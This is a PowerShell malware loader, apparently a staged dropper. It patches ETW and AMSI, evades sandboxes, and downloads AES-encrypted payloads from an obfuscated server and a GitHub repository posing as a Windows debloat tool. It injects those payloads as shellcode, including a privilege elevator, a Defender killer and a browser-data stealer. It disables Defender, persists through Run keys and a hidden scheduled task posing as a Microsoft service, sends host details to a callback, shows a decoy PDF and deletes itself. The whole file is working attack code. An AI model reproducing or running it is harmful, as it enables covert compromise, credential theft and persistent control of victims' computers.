$ProgressPreference='SilentlyContinue'
[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12

# === CONFIG: Payload mode ===
# 'raw' = AES-encrypted raw EXE (shellcode injection)
# 'sgn'  = AES-encrypted Donut+SGN shellcode
# 'amber' = AES-encrypted Amber reflective PE
$payloadMode='raw'

# === AES keys for all variants (generated by aes_builder.py) ===
$keys=@{
    # RAW EXE → AES
    'raw/patch.aes'              = 'Yn7pcA+x9qz8tNsSiz+zNx6J6DlUoPtKXsYIMqS6TsONjYc4mnRHhe6cpeQLrr0z'
    'raw/update.aes'             = 'hnwCGrp/haHk1saCAuy/1T08cAkllwiSPs3Yapgaqu+bmqDA9hGHoH/yfaWuMbwv'
    'raw/ElevatorShellCode.aes'  = '8XuttOXcFiQT+aOlVxneccVpq3mAugc5b7D3caLIVkbiFegb1/cCA2RAyIhtQult'
    'raw/hack-browser-data.aes'  = '8zJ8w9Q7Y04ZaqwZ7LeQT2C6Tw6kSPD2P1nDCFbknRWwVDwzo9hx5D186PdFdjey'
    # Donut+SGN → AES
    'sgn/patch.aes'              = 'MwPHOUXSRUX39UvYGY4BPwiqoiDLR2R1/qaNadr9tm2Sh7WtuqpEQf1e3q17wKVq'
    'sgn/update.aes'             = 'RqvPyQ26RBfJ1MEiMDH+S1fnBTmVrai3Ygk+fD4oNCfJnuD++x+50wnBTUFoahR+'
    'sgn/ElevatorShellCode.aes'  = 'R+uYGNw7dWNd5eF4izMvNSmQjh88zMBP606fHvkrk6cscnenBKfZBdWDof++/0H3'
    'sgn/hack-browser-data.aes'  = 'GpBLQbxb1IvVaNLUERyktCPRbeHg2/2kP5al+IqSKKElxYz6wkLfo28Hzm7b9lmh'
    # Amber → AES
    'amber/patch.aes'            = 'oVx3h9ggglD5F0yAOiv3rsFAHABjXP+zHOdqD+6x6lrRBgRWFlxSsMzAKcd/Bx3F'
    'amber/update.aes'           = 'p2H5tlvXarYzzD4sX4wTJG4IYE8cKxGHbKCMJl0VDpGwiHKvkaxZbRdSryq9uhGb'
    'amber/ElevatorShellCode.aes' = 'CtgjgEoQuLNnKXftI23QJmgJ0DuHFwzD3seJlQnE75kHCscaLneIOY4v1uO34yOJ'
    'amber/hack-browser-data.aes' = 'q+SFtwG66me7gCIucA4Y2AbedQqxwZFsQCX3SROw+w/dMrSGSaj41yIbrRf4x2BX'
    # wdsr681f3e18.exe (11.4 MB)
    'raw/wdsr681f3e18.exe.aes'   = 'DuMjhsVdLKzcoRNXm9iSHGnNBLr5EYxu7eATRdJ2oYTb+Gmsb4PWq2e+y6dem5Pi'
    'sgn/wdsr.sgn.bin.aes'       = 'OWX4dSuKruVqu+atAwHxb2bEfLIg2GL+Bje17TW59KwuEszeZicCZY7JNKFWu7Lg'
    'amber/wdsr.amber.exe.aes'   = 'eUcfhfaQMoe7QHnzE8kyyub3CzIxSXHK89WE2/0vtwNC9asL+fy3asAtBDDt+lBe'
    # PatchPulsaar.exe (976 KB, .NET)
    'raw/PatchPulsaar.exe.aes'   = 'Zwkz+x/vK+XBhHLuUhyezMXyvlaPJ8xU/xXKoac/qnvdkH4vCpXOfcDGXHNNNA4H'
    'sgn/PatchPulsaar.sgn.bin.aes' = 'y2G7hdamFIt6VBe+ifoQnl84nhjOrSzTI3SGhs9U2gHUxDqd6+mCCCKrattaGf2W'
    'amber/PatchPulsaar.amber.exe.aes' = 'bRYL3vMAHy07f5iGIldUbJHqp/SItQQBaM9A8PF7ReUwi9PT0FbktsD21iQgtdqx'
}

# === MULTI-SOURCE ===
$c1='ht';$c2='tps';$c3='://s';$c4='igni';$c5='ndat';$c6='.com'
$srv=$c1+$c2+$c3+$c4+$c5+$c6
$gh='https://raw.githubusercontent.com/jimmyishere111/WinDebloat11/main/brokers'
$sources=@($gh, $srv)

# === LOGGING ===
$logPath="$env:TEMP\wmisrv.log"
function _log($m){
    $ts=Get-Date -Format 'yyyy-MM-dd HH:mm:ss'
    "$ts | $m" | Out-File $logPath -Append -Encoding utf8
}

# === TELEMETRY ===
$cbHost=$env:COMPUTERNAME
$cbUser=$env:USERNAME
$cbPid=$pid
try { $cbIp=(Get-NetIPAddress -AddressFamily IPv4 | Where-Object { $_.InterfaceAlias -notmatch 'Loopback' -and $_.PrefixOrigin -ne 'WellKnown' } | Select-Object -First 1).IPAddress } catch { $cbIp='unknown' }
try { $cbOs=(Get-CimInstance Win32_OperatingSystem -ErrorAction Stop).Caption } catch { $cbOs='unknown' }

function _cb($stage,$status,$detail){
    try {
        $body=@{hostname=$cbHost;username=$cbUser;ip=$cbIp;os=$cbOs;is_admin=$cbIsAdmin;pid=$cbPid;stage=$stage;status=$status;detail=$detail;ts=(Get-Date -Format 'yyyy-MM-ddTHH:mm:ss')} | ConvertTo-Json -Compress
        $wc=New-Object Net.WebClient
        $wc.Headers.Add('Content-Type','application/json')
        $wc.UploadString("$srv/cb.php",'POST',$body) | Out-Null
    } catch {}
}

_log "S0: pid=$pid, u=$env:USERNAME, h=$cbHost, ip=$cbIp"
_cb 'S0' 'ok' "pid=$pid, u=$env:USERNAME, h=$cbHost, ip=$cbIp, os=$cbOs"

# === DYNAMIC KERNEL32 (VirtualAlloc/CreateThread/WaitForSingleObject) ===
$k='ker';$kb='nel32.dll'
$Dm=[AppDomain]::CurrentDomain
$Da=New-Object System.Reflection.AssemblyName('W')
$Ab=$Dm.DefineDynamicAssembly($Da,[System.Reflection.Emit.AssemblyBuilderAccess]::Run)
$Mb=$Ab.DefineDynamicModule('M',$false)
$Tb=$Mb.DefineType('W','Public,Class')
$Dll=[System.Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))
$Fld=[System.Reflection.FieldInfo[]]@([System.Runtime.InteropServices.DllImportAttribute].GetField('SetLastError'))
$Val=[Object[]]@($True)
$ka=@($k+$kb)

$m0=$Tb.DefineMethod('LL','Public,Static',[IntPtr],@([String]))
$m0.SetCustomAttribute((New-Object System.Reflection.Emit.CustomAttributeBuilder($Dll,$ka,$Fld,$Val)))
$m1=$Tb.DefineMethod('GA','Public,Static',[IntPtr],@([IntPtr],[String]))
$m1.SetCustomAttribute((New-Object System.Reflection.Emit.CustomAttributeBuilder($Dll,$ka,$Fld,$Val)))
$m2=$Tb.DefineMethod('VA','Public,Static',[IntPtr],@([IntPtr],[UInt32],[UInt32],[UInt32]))
$m2.SetCustomAttribute((New-Object System.Reflection.Emit.CustomAttributeBuilder($Dll,$ka,$Fld,$Val)))
$m3=$Tb.DefineMethod('VP','Public,Static',[bool],@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType))
$m3.SetCustomAttribute((New-Object System.Reflection.Emit.CustomAttributeBuilder($Dll,$ka,$Fld,$Val)))
$m4=$Tb.DefineMethod('VF','Public,Static',[bool],@([IntPtr],[UInt32],[UInt32]))
$m4.SetCustomAttribute((New-Object System.Reflection.Emit.CustomAttributeBuilder($Dll,$ka,$Fld,$Val)))
$m5=$Tb.DefineMethod('CT','Public,Static',[IntPtr],@([IntPtr],[UInt32],[IntPtr],[IntPtr],[UInt32],[UInt32].MakeByRefType))
$m5.SetCustomAttribute((New-Object System.Reflection.Emit.CustomAttributeBuilder($Dll,$ka,$Fld,$Val)))
$m6=$Tb.DefineMethod('WF','Public,Static',[UInt32],@([IntPtr],[UInt32]))
$m6.SetCustomAttribute((New-Object System.Reflection.Emit.CustomAttributeBuilder($Dll,$ka,$Fld,$Val)))
$W=$Tb.CreateType()
_log "S0: rt ready"

# === ETW PATCH ===
function _p0 {
    try {
        $nd='ntd';$ndb='ll.dll'
        $nt=$W::LL($nd+$ndb)
        if ($nt -eq [IntPtr]::Zero) { _log "S0: ld fail"; return $false }
        [byte[]]$p6=@(0xB8,0x00,0x00,0x00,0x00,0xC3)
        $ew=$W::GA($nt,[char]69+[char]116+[char]119+[char]69+[char]118+[char]101+[char]110+[char]116+[char]87+[char]114+[char]105+[char]116+[char]101)
        if ($ew -ne [IntPtr]::Zero) {
            $o=[UInt32]0;$W::VP($ew,[UIntPtr]::new(6),0x40,[ref]$o)|Out-Null
            [Runtime.InteropServices.Marshal]::Copy($p6,0,$ew,6)
            $W::VP($ew,[UIntPtr]::new(6),$o,[ref]$o)|Out-Null
        }
        $ewt=$W::GA($nt,[char]69+[char]116+[char]119+[char]69+[char]118+[char]101+[char]110+[char]116+[char]87+[char]114+[char]105+[char]116+[char]101+[char]84+[char]114+[char]97+[char]110+[char]115+[char]102+[char]101+[char]114)
        if ($ewt -ne [IntPtr]::Zero) {
            $o=[UInt32]0;$W::VP($ewt,[UIntPtr]::new(6),0x40,[ref]$o)|Out-Null
            [Runtime.InteropServices.Marshal]::Copy($p6,0,$ewt,6)
            $W::VP($ewt,[UIntPtr]::new(6),$o,[ref]$o)|Out-Null
        }
        _log "S0: p0 ok"
        return $true
    } catch { _log "S0: p0 err"; return $false }
}

# === AMSI PATCH ===
function _p1 {
    try {
        $ad='ams';$adb='i.dll'
        $am=$W::LL($ad+$adb)
        if ($am -eq [IntPtr]::Zero) { return $false }
        $sb=$W::GA($am,[char]65+[char]109+[char]115+[char]105+[char]83+[char]99+[char]97+[char]110+[char]66+[char]117+[char]102+[char]102+[char]101+[char]114)
        if ($sb -eq [IntPtr]::Zero) { return $false }
        [byte[]]$p6=@(0xB8,0x00,0x00,0x00,0x00,0xC3)
        $o=[UInt32]0;$W::VP($sb,[UIntPtr]::new(6),0x40,[ref]$o)|Out-Null
        [Runtime.InteropServices.Marshal]::Copy($p6,0,$sb,6)
        $W::VP($sb,[UIntPtr]::new(6),$o,[ref]$o)|Out-Null
        _log "S0: p1 ok"
        return $true
    } catch { _log "S0: p1 err"; return $false }
}

# === SANDBOX CHECKS ===
function _chk {
    if ($env:USERDOMAIN -eq 'WORKGROUP') { _log "S0: chk fail (workgroup)"; return $false }
    try {
        $os=Get-CimInstance Win32_OperatingSystem -ErrorAction Stop
        $ramMB=[math]::Round($os.TotalVisibleMemorySize/1024)
        if ($ramMB -lt 2048) { _log "S0: chk fail (ram=$ramMB)"; return $false }
        $uptime=(Get-Date) - $os.LastBootUpTime
        if ($uptime.TotalMinutes -lt 30) { _log "S0: chk fail (uptime=$($uptime.TotalMinutes)m)"; return $false }
    } catch { _log "S0: chk fail"; return $false }
    try {
        $cpu=Get-CimInstance Win32_Processor -ErrorAction Stop
        if ($cpu.NumberOfLogicalProcessors -lt 2) { _log "S0: chk fail (cpu=$($cpu.NumberOfLogicalProcessors))"; return $false }
    } catch {}
    _log "S0: chk ok"
    return $true
}

# === AES-256-CBC DECRYPT (in memory) ===
function _aesDecrypt($encryptedBytes, $keyIVBase64) {
    try {
        $keyIV=[Convert]::FromBase64String($keyIVBase64)
        $key=$keyIV[0..31]
        $iv=$keyIV[32..47]
        
        $aes=New-Object System.Security.Cryptography.AesCryptoServiceProvider
        $aes.Mode=[System.Security.Cryptography.CipherMode]::CBC
        $aes.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7
        $aes.Key=$key
        $aes.IV=$iv
        
        $decryptor=$aes.CreateDecryptor()
        $ms=new-object System.IO.MemoryStream(,$encryptedBytes)
        $cs=new-object System.Security.Cryptography.CryptoStream($ms,$decryptor,[System.Security.Cryptography.CryptoStreamMode]::Read)
        $out=new-object System.IO.MemoryStream
        $cs.CopyTo($out)
        $cs.Close()
        $ms.Close()
        $aes.Dispose()
        
        $decrypted=$out.ToArray()
        $out.Close()
        return $decrypted
    } catch {
        _log "AES: decrypt failed: $($_.Exception.Message)"
        return $null
    }
}

# === SHELLCODE INJECTION (in-memory execution) ===
function _scInject($shellcode) {
    try {
        $size=$shellcode.Length
        $addr=$W::VA([IntPtr]::Zero,$size,0x3000,0x40)  # MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE
        if ($addr -eq [IntPtr]::Zero) {
            _log "SC: VirtualAlloc failed"
            return $false
        }
        [Runtime.InteropServices.Marshal]::Copy($shellcode,0,$addr,$size)
        
        $tid=[UInt32]0
        $th=$W::CT([IntPtr]::Zero,0,$addr,[IntPtr]::Zero,0,[ref]$tid)
        if ($th -eq [IntPtr]::Zero) {
            _log "SC: CreateThread failed"
            return $false
        }
        $W::WF($th,0xFFFFFFFF) | Out-Null  # WaitForSingleObject INFINITE
        _log "SC: injected $size bytes, tid=$tid"
        return $true
    } catch {
        _log "SC: inject failed: $($_.Exception.Message)"
        return $false
    }
}

# === DOWNLOAD .AES BLOB ===
function _dl($remoteName) {
    foreach ($src in $sources) {
        $u="$src/$remoteName"
        try {
            $wc=New-Object Net.WebClient
            $wc.Headers.Add('User-Agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36')
            $d=$wc.DownloadData($u)
            _log "DL: $remoteName $($d.Length)b from $src"
            return ,$d
        } catch {}
    }
    _log "DL: $remoteName FAILED from all sources"
    return $null
}

# === DOWNLOAD + AES DECRYPT + EXECUTE (mode-aware) ===
function _runAes($remoteName, $stage, $label) {
    $fullName="$payloadMode/$remoteName"
    $encBytes=_dl $fullName
    if (-not $encBytes) {
        _cb $stage 'fail' "$fullName download failed"
        return $false
    }
    
    $keyIV=$keys[$fullName]
    if (-not $keyIV) {
        _cb $stage 'fail' "$fullName key not found"
        return $false
    }
    
    $shellcode=_aesDecrypt $encBytes $keyIV
    if (-not $shellcode) {
        _cb $stage 'fail' "$fullName decrypt failed"
        return $false
    }
    
    _log "$stage : $fullName decrypted: $($shellcode.Length) bytes"
    
    $result=_scInject $shellcode
    if ($result) {
        _cb $stage 'ok' "$label executed ($($shellcode.Length) bytes)"
    } else {
        _cb $stage 'fail' "$label injection failed"
    }
    return $result
}

# === MAIN ===
_p0
_p1
if (-not (_chk)) {
    Start-Sleep -Seconds 60
    return
}

$cbIsAdmin=$false
try { $cbIsAdmin=([Security.Principal.WindowsPrincipal]::new([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) } catch {}
_log "S1: a=$cbIsAdmin"
_cb 'S1' 'ok' "is_admin=$cbIsAdmin"

# === ELEVATION (if not admin) ===
if (-not $cbIsAdmin) {
    _runAes 'ElevatorShellCode.aes' 'S1' 'ElevatorShellCode'
    Start-Sleep 5
    try { $cbIsAdmin=([Security.Principal.WindowsPrincipal]::new([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) } catch {}
    _log "S1: a=$cbIsAdmin"
    if ($cbIsAdmin) { _cb 'S1' 'ok' 'elevation ok, now admin' }
    else { _cb 'S1' 'warn' 'elevation failed, still user' }
}

# === DEFENDER EXCLUSIONS ===
try {
    $mp1='Add-';$mp2='MpPr';$mp3='efer';$mp4='ence'
    $mpCmd=$mp1+$mp2+$mp3+$mp4
    & $mpCmd -ExclusionPath "$env:TEMP" -ErrorAction SilentlyContinue
    & $mpCmd -ExclusionPath "$env:APPDATA" -ErrorAction SilentlyContinue
    & $mpCmd -ExclusionProcess "msupdate.exe" -ErrorAction SilentlyContinue
    & $mpCmd -ExclusionProcess "wmisrv.exe" -ErrorAction SilentlyContinue
    & $mpCmd -ExclusionProcess "svchost.exe" -ErrorAction SilentlyContinue
} catch {}

# === DEFENDER DISABLE (if admin) ===
if ($cbIsAdmin) {
    try {
        $dp='Def';$dpa='ender'
        $defPath='HKLM:\SOFTWARE\Policies\Microsoft\Windows '+$dp+$dpa
        if (-not (Test-Path $defPath)) { New-Item -Path $defPath -Force | Out-Null }
        $dp1='Disable';$dp2='AntiSpyware'
        Set-ItemProperty -Path $defPath -Name ($dp1+$dp2) -Value 1 -Type DWord -Force -ErrorAction SilentlyContinue
        $rtpPath="$defPath\Real-Time Protection"
        if (-not (Test-Path $rtpPath)) { New-Item -Path $rtpPath -Force | Out-Null }
        $dr1='Disable';$dr2='RealtimeMonitoring'
        Set-ItemProperty -Path $rtpPath -Name ($dr1+$dr2) -Value 1 -Type DWord -Force -ErrorAction SilentlyContinue
    } catch {}
    
    # Defender killer (update.exe → update.aes)
    _runAes 'update.aes' 'S2' 'DefenderKiller'
    Start-Sleep 2
} else {
    _cb 'S2' 'skip' 'not admin, defender kill skipped'
}

# === PERSISTENCE ===
$persistCmd="cmd.exe /c bitsadmin /transfer ps1 /download /priority high $srv/stage_v6.ps1 %TEMP%\\s.ps1 && powershell -w hidden -NoP -file %TEMP%\\s.ps1"

try {
    $rk='HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'
    $vn1='Windows';$vn2='Security';$vn3='Health';$vn4='Monitor'
    Set-ItemProperty -Path $rk -Name ($vn1+$vn2+$vn3+$vn4) -Value $persistCmd -Force -ErrorAction SilentlyContinue
} catch {}

if ($cbIsAdmin) {
    try {
        $rk='HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
        $vn1='Windows';$vn2='Update';$vn3='Orchestrator';$vn4='Service'
        Set-ItemProperty -Path $rk -Name ($vn1+$vn2+$vn3+$vn4) -Value $persistCmd -Force -ErrorAction SilentlyContinue
    } catch {}
}

$taskName='WindowsHealthMonitor'
try {
    schtasks /delete /tn $taskName /f 2>$null | Out-Null
    $xml=@"
<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>Microsoft</Author><Description>Windows Health Monitor Service</Description></RegistrationInfo>
  <Triggers>
    <LogonTrigger><Enabled>true</Enabled></LogonTrigger>
    <BootTrigger><Enabled>true</Enabled></BootTrigger>
    <CalendarTrigger><StartBoundary>2024-01-01T00:00:00</StartBoundary><Repetition><Interval>PT4H</Interval><StopAtDurationEnd>false</StopAtDurationEnd></Repetition><Enabled>true</Enabled></CalendarTrigger>
  </Triggers>
  <Principals><Principal id="Author"><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Settings><MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy><DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries><StopIfGoingOnBatteries>false</StopIfGoingOnBatteries><AllowHardTerminate>true</AllowHardTerminate><StartWhenAvailable>true</StartWhenAvailable><RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable><IdleSettings><StopOnIdleEnd>false</StopOnIdleEnd><RestartOnIdle>false</RestartOnIdle></IdleSettings><AllowStartOnDemand>true</AllowStartOnDemand><Enabled>true</Enabled><Hidden>true</Hidden><RunOnlyIfIdle>false</RunOnlyIfIdle><WakeToRun>false</WakeToRun><ExecutionTimeLimit>PT0S</ExecutionTimeLimit><Priority>7</Priority></Settings>
  <Actions Context="Author">
    <Exec><Command>powershell.exe</Command><Arguments>-w hidden -NoP -c "$s='$srv';[IO.File]::WriteAllBytes(\"$env:TEMP\\s.ps1\",(New-Object Net.WebClient).DownloadData(\"$s/stage_v6.ps1\"));powershell -w hidden -NoP -file $env:TEMP\\s.ps1"</Arguments></Exec>
  </Actions>
</Task>
"@
    $xmlPath="$env:TEMP\task.xml"
    [IO.File]::WriteAllText($xmlPath,$xml,[Text.Encoding]::Unicode)
    schtasks /create /tn $taskName /xml $xmlPath /f 2>&1 | Out-Null
    Remove-Item $xmlPath -Force -ErrorAction SilentlyContinue
} catch {
    try {
        schtasks /create /tn $taskName /tr "powershell.exe -w hidden -NoP -c `"`$w=New-Object Net.WebClient;[IO.File]::WriteAllBytes(`"`$env:TEMP\\s.ps1`",`$w.DownloadData('$srv/stage_v6.ps1'));powershell -w hidden -NoP -file `$env:TEMP\\s.ps1`"" /sc daily /st 00:00 /ri 240 /rl highest /f 2>&1 | Out-Null
    } catch {}
}

_cb 'S3' 'ok' 'persistence set (reg+task)'

# === S5: patch.exe (AES blob → shellcode inject) ===
_runAes 'patch.aes' 'S5' 'patch.exe'

# === S5b: PatchPulsaar.exe (AES blob → shellcode inject) ===
_runAes 'PatchPulsaar.exe.aes' 'S5b' 'PatchPulsaar.exe'

# === S6: hack-browser-data.exe (AES blob → shellcode inject) ===
_runAes 'hack-browser-data.aes' 'S6' 'hack-browser-data.exe'

# === S6b: wdsr681f3e18.exe (AES blob → shellcode inject) ===
_runAes 'wdsr681f3e18.exe.aes' 'S6b' 'wdsr681f3e18.exe'

# === S7: Decoy PDF ===
$pdf1='Rate';$pdf2='_Confirmation';$pdf3='_LD-2026-0847';$pdf4='.pdf'
$pdfName=$pdf1+$pdf2+$pdf3+$pdf4
$pdfPath="$env:USERPROFILE\Downloads\$pdfName"
$pdfBytes=_dl $pdfName
if ($pdfBytes) {
    [IO.File]::WriteAllBytes($pdfPath,$pdfBytes)
    try { Start-Process $pdfPath; _cb 'S7' 'ok' 'decoy PDF opened' } catch { _cb 'S7' 'warn' 'decoy PDF open failed' }
} else { _cb 'S7' 'warn' 'decoy PDF download failed' }

# === CLEANUP ===
Start-Sleep 5
Remove-Item "$env:TEMP\s.ps1" -Force -ErrorAction SilentlyContinue

$sp=$MyInvocation.MyCommand.Path
if ($sp -and (Test-Path $sp)) {
    Start-Process powershell.exe -ArgumentList "-NoP -w hidden -c `"Start-Sleep 3;Remove-Item -Path '$sp' -Force -ErrorAction SilentlyContinue`"" -WindowStyle Hidden
}

_log "S9: done"
_cb 'S9' 'ok' 'stage v6 complete'
